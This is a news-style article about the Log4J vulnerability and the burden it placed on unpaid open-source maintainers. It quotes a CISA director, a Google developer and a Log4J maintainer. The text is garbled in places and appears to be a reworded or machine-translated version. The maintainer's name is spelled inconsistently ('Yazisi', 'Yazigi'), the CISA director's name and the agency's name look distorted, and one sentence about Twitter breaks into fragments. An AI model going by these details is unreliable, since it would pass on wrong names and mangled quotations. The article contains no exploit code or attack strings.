It is very easy to exploit the vulnerability in Log4J. After sending a string of malicious characters to a vulnerable device, hackers can execute any code they want. Some of the first attacks were kids pasting malicious code into Minecraft servers. Hackers, including some linked to China and Iran, are now seeking to exploit the vulnerability in any device they can find running with the flawed code.
And there is no clear end in sight. The Log4J issue amounts to a long-term security crisis that is expected to last for months or years. Jane Easterly, director of the US Agency for Cybersecurity and Infrastructure Security, said this was “one of the most serious flaws” she had ever seen.
For something so important, you might expect the world’s largest tech companies and governments to contract hundreds of highly paid experts to quickly fix the flaw.
The truth is different: Log4J, which has always been an important part of the core Internet infrastructure, was founded as a voluntary project and is still largely run for free, even though many multimillion and billion dollar companies depend on it and benefit from it every day. Yazisi and his team are trying to fix it for nothing.
This strange situation is routine in the world of open source software, programs that allow anyone to examine, modify, and use their code. It’s a decades-old idea that has become critical to the workings of the Internet. When things go right, open source is a collaborative triumph. When something goes wrong, it’s a far-reaching danger.
“Open source runs the internet, and thus the economy,” says Filippo Valsorda, a developer working on open source projects at Google. However, he explains, “It is very common for even basic infrastructure projects to have a small team of supervisors, or even a single supervisor who is not paid to work on that project.”
“The team works around the clock,” Yazisi told me via email when I first contacted him. “And my shift from 6 a.m. to 4 a.m. just ended (no, there’s no typo in time).”
In the middle of his long days, Yazigi spent time on it Pointing fingers at critics, Twitter That “Log4j maintainers have been sleeplessly working on mitigation measures; fixes, docs, CVEs, responses to queries, etc. However, nothing is stopping people from attacking us, for work we’re not paid for, for a feature we don’t all like but need to be retained due to backward compatibility concerns.”